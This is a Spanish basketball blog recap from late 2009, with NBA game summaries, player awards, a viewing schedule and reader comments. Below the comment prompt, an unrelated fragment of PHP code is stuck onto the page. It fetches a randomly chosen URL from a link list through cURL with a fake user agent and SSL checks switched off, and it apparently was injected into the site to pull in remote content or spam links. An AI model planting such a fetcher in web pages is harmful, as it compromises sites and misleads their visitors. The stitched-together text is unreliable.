La Crónica (30/11/2009)

01 de December de 2009 por TheDeerHunter

Nuevo partidazo de Monta, el mejor de su carrera, contra los Pacers. Anoche tocaba cara para la táctica del todo o nada de Nelson. Partido caótico con 46 pérdidas por 44 asistencias entre ambos y, a río revuelto ganancia de estos Warriors-pescadores. Cruel recibimiento le dieron a Dunleavy tras tanto tiempo en el dique seco. Él estuvo bastante bien, por cierto, pero el equipo se está metiendo en una de esas fases de flojera que atraviesa todos los años.

También volvía Bogut y con él las victorias para los Bucks. Excelente partido colectivo de los “ciervos”. Los 5 titulares en dobles figuras y los suplentes respondiendo. No podemos decir lo mismo de los Bulls, que están echando excesivamente de menos las bajas de Hinrich y la ya conocida de Tyrus Thomas.

Los Jazz dieron buena cuenta de los Grizzlies, en un paso atrás en la particular carrera por el all-star de Marc Gasol. Los de Sloan no notaron la baja de Kirilenko con las habituales grandes actuaciones de Deron&Boozer y las menos habituales de Brewer y Wes Matthews.

Por último, los Sixers les dieron un susto morrocotudo a los Mavs en su casa con una inesperada remontada en el último cuarto que abortó Terry en un último tiro algo afortunado (y ya hemos visto algún otro para este equipo). De poco sirvió el excelente partido de Brand saliendo desde el banco, ni los 19 rebotes de Dalembert, como tampoco el partidazo de la tríada Green-Young-Iguodala.

PREMIOS

MVP: 4 vez en los últimos 5 partidos que Monta Ellis supera la treintena de puntos y segunda vez en 3 partidos que se va por encima de los 40. Esta vez han sido 45 aderezados con 5 robos y 5 rebotes. Lástima de las 7 pérdidas. Partidazos, cercanos al triple doble, de Jason Kidd (22 puntos, 6 rebotes y 11 asistencias) y Carlos Boozer (24 puntos, 15 rebotes y 7 asistencias).

Rookie: Premio para Walter Matthews, asentado como titular en los Jazz, con 17 puntos (6 de 7 en tiro) y 5 asistencias. Jennings últimamente protagoniza unos porcentajes de tiro bastante pobres.

Sorpresa: Sorpresón que un jugador vuelva de una lesión y se casque una actuación como la que protagonizó ayer Andrew Bogut en la victoria de su equipo. 22 puntos y 15 rebotes nada menos. Hay que destacar también a Willie Green, eterno sustituto del base-escolta titular de turno en Philadelphia (23 puntos y 8 rebotes) y a Marcus Williams que con la baja de Conley ha gozado de minutos haciéndolo mucho mejor que Jamal Tinsley (17 puntos y 6 rebotes).

Decepción: Ya que aplaudimos todas sus buenas actuaciones también es de justicia destacar las malas. Y es que 5 puntos y 3 rebotes en 31 minutos es algo muy pobre para el Marc Gasol de esta temporada.

Esfuerzo en vano: El de la pareja Deng-Noah que luchó lo indecible frente los Bucks y acabó con 38 puntos y 31 rebotes.

RAZONES PARA TRASNOCHAR

Nos espera esta madrugada una bonita jornada de seis partidos en la que todo el morbo se concentra en el Madison, donde los mejores Suns en mucho tiempo rinden visita (1h30) a D’Antoni, al frente de unos Knicks casi peores de lo que ya nos tenían acostumbrados. También interesantes serán los otros cinco partidos: a la 1h00, Wizards @ Raptors con ambos equipos en crisis de identidad y de resultados, y un Celtics @ Bobcats más incierto de lo que pueda parecer. A las 3h00, los Warriors tratarán de imitar la reciente gesta de los Wolves y ganar en Denver. Una hora más tarde, Heat @ Blazers con el enésimo regreso a Portland de un Jermaine que parece el abuelo de aquel que descubrimos a finales del siglo pasado. Cierran la jornada a las 4h30 los Lakers en casa ante los sorprendentes Hornets de Darren Collison y Marcus Thorton, quienes, pese a todo, no han ganado fuera de casa desde la lesión de Chris Paul.

VIDEO DEL DÍA

Lo más espectacular, sin duda, el canastón de Jason Terry para ganar el partido.

Comenta

4 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    La idiotez de Dalembert de tocar el ultimo tiro de Iguodala a 1 segundo del final a que ha venido?? porque parecia que entraba, nose si dentro del tiempo pero lo que seguro que no estaba dentro del tiempo era el palmeo-tapon de Dalembert….

      Citar

  2. the answer dice:
    #2

    La verdad es que lo de Dalembert es de figura, menudo tio, yo no se si entraria o no pero, macho el Dalembert es que se ha coronado
    Que partidazo de Ellis, bestial

      Citar

  3. Tobal dice:
    #3

    Partidazo de Monta Ellis,que es una máquina de anotar,es un jugador espectacular con sus entradas a canasta y su velocidad,cuando está así,es imparable.Luego destacar la vuelta de Bogut,que lo notó mucho su equipo,es un hombre importantísimo en estos Bucks que de momento están en puestos de privilegio en el Este.

      Citar

  4. sergio dice:
    #4

    El otro dia, cuando Jason Kidd se puso en el 2º escalon de los maximos asistentes de la historia me dio cierta pena pensar que nunca jamas podria llegar a alcanzar el record. Me planteaba que otros records insuperables puede haber por ahi….

    Yo pondria, aparte de las asitencias de Stockton, el promedio anotador en una temporada de Will, o su promedio de temporada como Rookie, obviamente los promedios de rebotes y numero de rebotes en un partido de Bill o Wilt, el record de tapones de Mark Eaton, o en un partido de Elmore Smith, record de partidos de Bellamy, minutos por partido de Wilt, porcentaje de tiro en una temporada,…. alguno mas???

    Porque nos gustaran tanto las listas???

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>